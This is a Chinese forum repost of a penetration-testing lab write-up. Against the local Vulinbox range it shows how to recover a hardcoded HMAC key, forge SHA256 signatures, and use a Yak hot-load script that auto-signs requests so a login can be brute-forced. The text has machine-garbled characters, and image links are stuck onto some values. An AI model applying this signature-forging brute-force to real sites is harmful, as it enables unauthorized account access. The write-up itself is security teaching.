刘俊凯 发表于 2024-12-14 09:57:37

渗透测试-前端验签绕过之SHA256

本文是高级前端加解密与验签实战的第1篇文章,本系列文章实验靶场为Yakit里自带的Vulinbox靶场,本文讲述的是绕过SHA256签名来爆破登录。
绕过

https://img2024.cnblogs.com/blog/2855436/202412/2855436-20241214005130112-183765002.png
通过查看源代码可以看到key为
1234123412341234https://img2024.cnblogs.com/blog/2855436/202412/2855436-20241214005133198-1662357300.png
通过查看源代码可以看到是通过SHA256来举行签名的,他把哀求体的username和password字段提取,然后举行加密。
username=admin&password=admin123https://img2024.cnblogs.com/blog/2855436/202412/2855436-20241214005136827-1401035207.png
利用Cyberchief加密,最终得到加密值为:fc4b936199576dd7671db23b71100b739026ca9dcb3ae78660c4ba3445d0654d
https://img2024.cnblogs.com/blog/2855436/202412/2855436-20241214005139852-723382500.png
可以看到本身计算和前端计算的同等:
https://img2024.cnblogs.com/blog/2855436/202412/2855436-20241214005143563-741888526.png
修改暗码,重新构造签名:
username=admin&password=666666
=>
26976ad249c29595c3e9e368d9c3bc772b5a27291515caddd023d69421b7ffeehttps://img2024.cnblogs.com/blog/2855436/202412/2855436-20241214005148499-2079865334.png
发送哀求,可以看到验签成功,暗码正确登岸成功,自此签名绕过成功。
POST /crypto/sign/hmac/sha256/verify HTTP/1.1
Host: 127.0.0.1:8787
Content-Type: application/json

{
"signature": "26976ad249c29595c3e9e368d9c3bc772b5a27291515caddd023d69421b7ffee",
"key": "31323334313233343132333431323334",
"username": "admin",
"password": "666666"
}https://img2024.cnblogs.com/blog/2855436/202412/2855436-20241214005152327-1303090435.png
热加载

这是我写的热加载代码,通过beforeRequest挟制哀求包,利用encryptData函数举行加密,最终实现热加载主动签名功能。
encryptData = (packet) => {    body = poc.GetHTTPPacketBody(packet)    params = json.loads(body)    //获取账号和暗码    name = params.username    pass= params.password    key = "31323334313233343132333431323334"    //十六进制密钥    //HmacSha256加密    signText = f`username=${name}&password=${pass}`    sign = codec.EncodeToHex(codec.HmacSha256(f`${codec.DecodeHex(key)~}`, signText))    //构造哀求体    result = f`{"username":"${name}","password":"${pass}","signature":"${sign}","key":"${key}"}`    return string(poc.ReplaceBody(packet, result, false))}//发送到服务端修改数据包// beforeRequest = func(req){//   return encryptData(req)// }//调试用packet =
页: [1]
查看完整版本: 渗透测试-前端验签绕过之SHA256